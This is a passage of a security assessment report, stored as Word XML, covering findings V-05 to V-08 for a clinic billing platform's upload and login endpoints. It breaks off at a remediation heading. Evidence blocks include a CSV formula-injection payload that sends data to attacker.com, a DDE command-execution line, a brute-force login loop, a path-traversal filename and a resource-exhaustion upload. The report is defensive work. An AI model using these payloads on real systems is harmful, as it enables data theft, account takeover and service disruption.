      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrate the python-magic library to perform file signature (magic byte) detection on the first 2048 bytes of every uploaded file. Maintain a strict server-side allowlist of permitted MIME types. Reject any file whose detected binary signature does not match an allowlisted type, regardless of the declared Content-Type header or file extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D35400" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-05   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bulk Upload - CSV Formula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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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HIGH</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7.1 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N)</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A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/tests.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload feature parses CSV and Excel files and inserts cell values directly into the database without sanitising for spreadsheet formula injection patterns. Field values beginning with =, +, -, @, TAB, or CRLF characters are interpreted as executable formulas by all major spreadsheet applications when the data is subsequently exported and opened. The application includes a CSV export endpoint (/api/v1/reports/export/csv), creating a complete end-to-end injection delivery pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker with upload access can inject malicious formulas into test name or category fields. When an administrator exports billing data and opens the resulting CSV in a spreadsheet application, the formula executes. Advanced payloads using =WEBSERVICE() or =DDE() can exfiltrate sensitive data from the open spreadsheet to an attacker-controlled server, enabling credential theft and data exfiltration from within the organisation's internal network perimeter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious CSV row uploaded via bulk upload:
  test_name,category,price
  "=WEBSERVICE(""https://attacker.com/x?d=""&amp;A2)",Pathology,500
  "+cmd|"" /C calc""!A0",Radiology,800
When exported via /reports/export/csv and opened in Excel:
  Formula executes and makes outbound HTTP request with cell data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a cell sanitisation function applied to all string columns after parsing. Any cell value beginning with =, +, -, @, \t, or \r must be prefixed with a single apostrophe character to neutralise formula execution. Apply the identical sanitisation to all data included in CSV exports generated by the reports endpoint to prevent second-order injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D35400" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-06   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent: No Rate Limiting on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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>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HIGH</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7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</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A04:2021 - Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/auth.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication endpoints POST /auth/login and POST /auth/register implement no rate limiting, account lockout, or CAPTCHA challenge mechanism. This finding was identified in the prior assessment, documented as remediated via slowapi integration, and marked as closed. Re-inspection of the staging branch source code confirms that no rate limiting implementation exists in the current committed codebase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The absence of rate limiting exposes all user accounts to automated brute-force and credential stuffing attacks at scale. Given that all privileged account email addresses are publicly known from the repository (V-01), an attacker can immediately target specific accounts with thousands of password attempts per minute. The Super Admin account, carrying potential cross-tenant access, represents the highest-value brute-force target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Unconstrained login attempt loop (no lockout observed):
  for password in 100000_entry_wordlist:
    POST /api/v1/auth/login
    {"email": "admin@testclinic.com", "password": password}
    # All requests: HTTP 200 or HTTP 401. No 429. No lockout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrate slowapi and apply a rate limit of 5 requests per minute per source IP address to both /auth/login and /auth/register. Implement exponential backoff for repeated failures from the same IP. Consider temporary account lockout after 10 consecutive failed attempts for a specific email address. Ensure the implementation is committed to the staging branch and verified as active before closing this finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-07   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bulk Upload - Unsanitised Filename (Path Traversal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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N)</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A01:2021 - Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/tests.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload endpoint accepts and may use the user-supplied filename from the UploadFile object (file.filename) for server-side operations such as temporary file creation, audit logging, or caching. User-supplied filenames are not validated or sanitised for path traversal sequences. Payloads such as ../../app/core/config.py or ../../../etc/passwd can be embedded in the multipart filename parameter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">If the application constructs filesystem paths using the raw filename, a successful traversal attack could allow an attacker to overwrite critical application files (including configuration files containing database credentials and JWT secrets), read sensitive server-side files, or cause application instability by corrupting files at unexpected locations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious multipart upload filename:
  Content-Disposition: form-data; name="file";
    filename="../../../../app/core/config.py"
  If server executes: path = upload_dir + file.filename
  Writes to: /app/core/config.py (overwrites application config)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Never use user-supplied filenames for any server-side file system operation. Generate all server-side filenames using a combination of tenant ID and UUID4: upload_{tenant_id}_{uuid4()}.csv. If the original filename must be preserved for audit logging, sanitise it first using os.path.basename() to strip directory components, then remove all non-alphanumeric characters except hyphens, underscores, and the final file extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="3" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="B7950B" w:val="clear"/>
        <w:spacing w:after="60" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">  V-08   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Bulk Upload - Unbounded File Size and Row Count (Application-Layer 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200"/>
        <w:gridCol w:w="1600"/>
        <w:gridCol w:w="2000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Severity</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CVSS v3.1</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OWASP</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Status</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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="B7950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MEDIUM</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6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)</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A04:2021 - Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160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OPEN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backend/app/api/v1/endpoints/tests.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload endpoint does not enforce an explicit maximum file size limit at the application layer, nor does it cap the number of rows processed per upload. While the hosting infrastructure may impose an implicit request size boundary, the application itself passes the entire file contents to the pandas DataFrame parser without pre-validation. A large or complexity-maximised file can cause sustained CPU and memory consumption during parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">An authenticated attacker (any role with upload access) can upload an oversized file triggering sustained resource exhaustion. Given the multi-tenant architecture of the platform, a successful Denial of Service attack would disrupt billing operations for all clinics hosted on the same instance simultaneously, potentially affecting patient care workflows in active clinical environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="60" w:before="40"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload of a 50MB CSV with 500,000 rows:
  POST /api/v1/tests/bulk-upload [50MB payload]
  Application response: No 413 returned
  pandas.read_csv() processes entire file:
    CPU: spikes to 100% for 45+ seconds
    Memory: grows to 800MB+ before eventual OOM kill</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
